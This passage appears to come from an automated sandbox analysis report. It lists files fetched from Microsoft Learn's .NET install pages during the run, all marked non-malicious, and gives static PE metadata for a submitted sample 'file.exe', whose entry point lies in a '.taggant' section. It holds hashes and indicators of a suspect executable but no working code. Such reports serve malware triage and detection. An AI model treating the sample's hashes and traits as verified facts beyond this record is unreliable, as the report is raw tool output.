                                                                                                                                                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):13842
                                                                                                                                                                                  Entropy (8bit):7.802399161550213
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                  MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                  SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                  SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                  SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                  Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):33148
                                                                                                                                                                                  Entropy (8bit):4.917595394577667
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                  MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                  SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                  SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                  SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):5644
                                                                                                                                                                                  Entropy (8bit):4.785769732002188
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                  MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                  SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                  SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                  SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                  Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):35005
                                                                                                                                                                                  Entropy (8bit):7.980061050467981
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                  MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                  SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                  SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                  SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                  Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):4897
                                                                                                                                                                                  Entropy (8bit):4.8007377074457604
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                  MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                  SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                  SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                  SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                  Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1173007
                                                                                                                                                                                  Entropy (8bit):5.503893944397598
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                  MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                  SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                  SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                  SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1817143
                                                                                                                                                                                  Entropy (8bit):5.501007973622959
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                  MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                  SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                  SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                  SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1432
                                                                                                                                                                                  Entropy (8bit):4.986131881931089
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                  MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                  SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                  SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                  SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1154
                                                                                                                                                                                  Entropy (8bit):4.59126408969148
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                  MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                  SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                  SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                  SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                  Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):19696
                                                                                                                                                                                  Entropy (8bit):7.9898910353479335
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                  MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                  SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                  SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                  SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                  Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):33148
                                                                                                                                                                                  Entropy (8bit):4.917595394577667
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                  MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                  SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                  SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                  SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                  Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Entropy (8bit):7.9482826935582525
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                  File name:file.exe
                                                                                                                                                                                  File size:1'846'784 bytes
                                                                                                                                                                                  MD5:3ebf7bb70dc746683d4274c4af45c8ac
                                                                                                                                                                                  SHA1:c8e8a9ac38e48739061c5af85430db6b7524ff44
                                                                                                                                                                                  SHA256:5ace1684387f82c6460f08da599bbd3f11d56fc8e5404f5a345a099b7c64c478
                                                                                                                                                                                  SHA512:945da4c90d5bf99478c3c6e56e62c781c6bbff20301a82bb0f7b36741c89dabed5601ea07f1ee049e3a80e79c85f43d5ab0dc6e189a2dc1f59e3e045e1250a76
                                                                                                                                                                                  SSDEEP:49152:oL190+vuRlB360U24BwKE/SSTlL+kCrNh6Q1X/VmSDEIt:op9vuHGBmSSonNhZ1XMSn
                                                                                                                                                                                  TLSH:018533B91C2048DCC5871BB5D1A75E9BFE98F067C7B4DA4E6988633F02BF168362601D
                                                                                                                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................pI...........@...........................I.....PO....@.................................\...p..
                                                                                                                                                                                  Icon Hash:90cececece8e8eb0
                                                                                                                                                                                  Entrypoint:0x897000
                                                                                                                                                                                  Entrypoint Section:.taggant
                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                  Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                  Instruction
                                                                                                                                                                                  jmp 00007F59084E841Ah
                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                  0x10000x560000x26200c260ecfe3e4cbd596c26770b3ad4371bFalse0.9993084016393443data7.978865127343408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .rsrc0x570000x2b00x200a8ea2a249dd0c0c108ad99f51d2e1d1cFalse0.798828125data6.040617738125974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
